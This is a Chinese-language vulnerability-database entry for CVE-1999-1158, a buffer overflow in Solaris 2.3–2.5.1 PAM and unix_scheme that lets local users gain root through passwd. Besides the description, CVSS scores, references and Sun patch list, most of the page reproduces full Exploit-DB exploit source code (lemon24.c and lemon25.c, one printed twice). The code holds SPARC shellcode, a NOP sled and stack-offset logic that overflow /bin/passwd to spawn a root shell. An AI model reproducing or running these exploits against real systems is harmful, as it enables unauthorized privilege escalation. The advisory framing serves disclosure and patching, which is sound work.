CVE-1999-1158
CVSS7.2
发布时间 :1997-05-13 00:00:00
修订时间 :2008-09-05 16:18:51
NMCOE    

[原文]Buffer overflow in (1) pluggable authentication module (PAM) on Solaris 2.5.1 and 2.5 and (2) unix_scheme in Solaris 2.4 and 2.3 allows local users to gain root privileges via programs that use these modules such as passwd, yppasswd, and nispasswd.


[CNNVD]Solaris pluggable authentication module(PAM),unix_scheme漏洞(CNNVD-199705-013)

        (1)Solaris 2.5.1和2.5版本上运行的pluggable authentication module(PAM)和(2)Solaris 2.4和2.3版本上运行的unix_scheme存在漏洞。本地用户可以通过使用如passwd、yppasswd和 nispasswd的模块的程序获得根权限。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:sun:solaris:2.5
cpe:/o:sun:solaris:2.4
cpe:/o:sun:solaris:2.3
cpe:/o:sun:solaris:2.5.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1158
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-1158
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199705-013
(官方数据源) CNNVD

- 其它链接及资源

http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/139&type=0&nav=sec.sba
(VENDOR_ADVISORY)  SUN  00139
ftp://ftp.auscert.org.au/pub/auscert/advisory/AA-97.09.Solaris.passwd.buffer.overrun.vul
(UNKNOWN)  AUSCERT  AA-97.09

- 漏洞信息

Solaris pluggable authentication module(PAM),unix_scheme漏洞
高危 缓冲区溢出
1997-05-13 00:00:00 2005-10-20 00:00:00
本地  
        (1)Solaris 2.5.1和2.5版本上运行的pluggable authentication module(PAM)和(2)Solaris 2.4和2.3版本上运行的unix_scheme存在漏洞。本地用户可以通过使用如passwd、yppasswd和 nispasswd的模块的程序获得根权限。

- 公告与补丁

        

- 漏洞信息 (341)

Solaris 2.4 passwd, yppasswd, and nispasswd Overflow Exploits (EDBID:341)
solaris local
1997-07-12 Verified
0 Cristian Schipor
N/A [点击下载]
---------------------------- file newpass.c
-------------------------------
#include <stdio.h>
#include <syslog.h>

#define hidden_passwd "/bin/hpasswd" /*change here ...*/
#define MAX_LENGTH 32

void main(int argc, char *argv[])
{
int i;
char *args[10];

        if(argc < 10)
        {
                args[0]=hidden_passwd;
                for(i = 1; i<argc; i++)
                {
                        if(strlen(argv[i]) > MAX_LENGTH)
                        {
                                printf("You reached the maximum length in
args\n");
                                exit(0);
                        }
                        else args[i]=argv[i];
                }
                args[i]=(char *)0;
                execv(args[0],args);
        }
        else
        {
                printf("You reached the maximum number of args !\n");
        }
}

---------------------------- end newpass.c
-----------------------------------

------------------------------ EXPLOITS ----------------------------------

------------------------------ lemon24.c --------------------------------
/*
Exploit for Solaris 2.4 ( it is a little and subtile different  beetwen
this
exploit and the prog for Solaris 2.5 - the overflow buffer is shifted
with 1 char )
With argv[1] you can modify the stack_offset (+-256).
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

#define BUF_LENGTH      600
#define EXTRA           600
#define STACK_OFFSET    1400
#define SPARC_NOP       0xa61cc013

u_char sparc_shellcode[] =
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
"\x90\x0b\x80\x0e\x92\x03\xa0\x0c\x94\x1a\x80\x0a\x9c\x03\xa0\x14"
"\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
"\x91\xd0\x20\x08"
;

u_long get_sp(void)
{
  __asm__("mov %sp,%i0 \n");
}

void main(int argc, char *argv[])
{
  char buf[BUF_LENGTH + EXTRA + 8];
  long targ_addr;
  u_long *long_p;
  u_char *char_p;
  int i, code_length = strlen(sparc_shellcode),dso=0;

  if(argc > 1) dso=atoi(argv[1]);

  long_p =(u_long *)  buf ;
    targ_addr = get_sp() - STACK_OFFSET - dso;

  for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
    *long_p++ = SPARC_NOP;

  char_p = (u_char *) long_p;

  for (i = 0; i < code_length; i++)
    *char_p++ = sparc_shellcode[i];

  long_p = (u_long *) char_p;


  for (i = 0; i < EXTRA / sizeof(u_long); i++)
    *long_p++ =targ_addr;

  printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
  targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
  execl("/bin/passwd", "passwd", & buf[1],(char *) 0);
  perror("execl failed");
}

-------------------------------- end of lemon24.c
----------------------------

---------------------------------- lemon25.c
--------------------------------

/*
This is for Solaris 2.5.(1) !
With argv[1] you can modify the stack offset (+-500) if you have troubles
...
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

#define BUF_LENGTH      1100
#define EXTRA           1200
#define STACK_OFFSET    3800
#define SPARC_NOP       0xa61cc013

u_char sparc_shellcode[] =
"\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"
"\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
"\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"
"\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd4\xff\xff"
;

u_long get_sp(void)
{
  __asm__("mov %sp,%i0 \n");
}

void main(int argc, char *argv[])
{
  char buf[BUF_LENGTH + EXTRA];
  long targ_addr;
  u_long *long_p;
  u_char *char_p;
  int i, code_length = strlen(sparc_shellcode),dso=0;

  if(argc > 1) dso=atoi(argv[1]);

  long_p =(u_long *)  buf;
    targ_addr = get_sp() - STACK_OFFSET - dso;

  for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
    *long_p++ = SPARC_NOP;

  char_p = (u_char *) long_p;

  for (i = 0; i < code_length; i++)
    *char_p++ = sparc_shellcode[i];

  long_p = (u_long *) char_p;


  for (i = 0; i < EXTRA / sizeof(u_long); i++)
    *long_p++ =targ_addr;

  printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
  targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
  execl("/bin/passwd", "passwd", buf,(char *) 0);
  perror("execl failed");
}

----------------------------------- end of lemon25.c

// milw0rm.com [1997-07-12]
		

- 漏洞信息 (19158)

Sun Solaris <= 2.5.1 PAM & unix_scheme Vulnerability (EDBID:19158)
solaris local
1997-02-25 Verified
0 Cristian Schipor
N/A [点击下载]
source: http://www.securityfocus.com/bid/201/info

There is a buffer overflow condition on arguments in Pluggable Authentication Modules (PAM) and unix_scheme (5.4 and 5.3). Therefore, an unauthorized user could exploit this vulnerability via the passwd program to gain root access. Under SunOS 5.5.1, 5.5.1_x86, 5.5, 5.5_x86, yppasswd and nispasswd are hard links to the passwd program and therefore are also vulnerable. Under SunOS 5.4 and 5.3, passwd, yppasswd, and nispasswd are separate programs but they dynamically link unix_scheme and are affected. 

/*
This is for Solaris 2.5.(1) !
With argv[1] you can modify the stack offset (+-500) if you have troubles
...
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

#define BUF_LENGTH      1100
#define EXTRA           1200
#define STACK_OFFSET    3800
#define SPARC_NOP       0xa61cc013

u_char sparc_shellcode[] =
"\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"
"\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
"\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"
"\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd4\xff\xff"
;

u_long get_sp(void)
{
  __asm__("mov %sp,%i0 \n");
}

void main(int argc, char *argv[])
{
  char buf[BUF_LENGTH + EXTRA];
  long targ_addr;
  u_long *long_p;
  u_char *char_p;
  int i, code_length = strlen(sparc_shellcode),dso=0;

  if(argc > 1) dso=atoi(argv[1]);

  long_p =(u_long *)  buf;
    targ_addr = get_sp() - STACK_OFFSET - dso;

  for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
    *long_p++ = SPARC_NOP;

  char_p = (u_char *) long_p;

  for (i = 0; i < code_length; i++)
    *char_p++ = sparc_shellcode[i];

  long_p = (u_long *) char_p;


  for (i = 0; i < EXTRA / sizeof(u_long); i++)
    *long_p++ =targ_addr;

  printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
  targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
  execl("/bin/passwd", "passwd", buf,(char *) 0);
  perror("execl failed");
}
		

- 漏洞信息

8216
Solaris Pluggable Authentication Module Local Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

A local buffer overflow exists in Solaris implementation of Pluggable Authentication Module (PAM). PAM performs insufficient bounds checking on arguments resulting in a boundary condition overflow. With a specially crafted request, an unauthorized user could overflow a buffer via the passwd program to gain root access. Under some versions of Solaris, yppasswd and nispasswd are hard links to the passwd program and therefore are also vulnerable.

- 时间线

1997-02-25 1997-02-25
1997-02-25 Unknow

- 解决方案

Patches are available to all Sun customers at http://sunsolve.sun.com Sun Solaris 2.3: Patch 101318-87 Sun Solaris 2.4 _x86: Patch 101946-43 Sun Solaris 2.4: Patch 101945-49 Sun Solaris 2.5 _x86: Patch 103179-03 Sun Solaris 2.5: Patch 103178-03 Sun Solaris 2.5.1 _x86: Patch 104434-02 Sun Solaris 2.5.1: Patch 104433-03

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站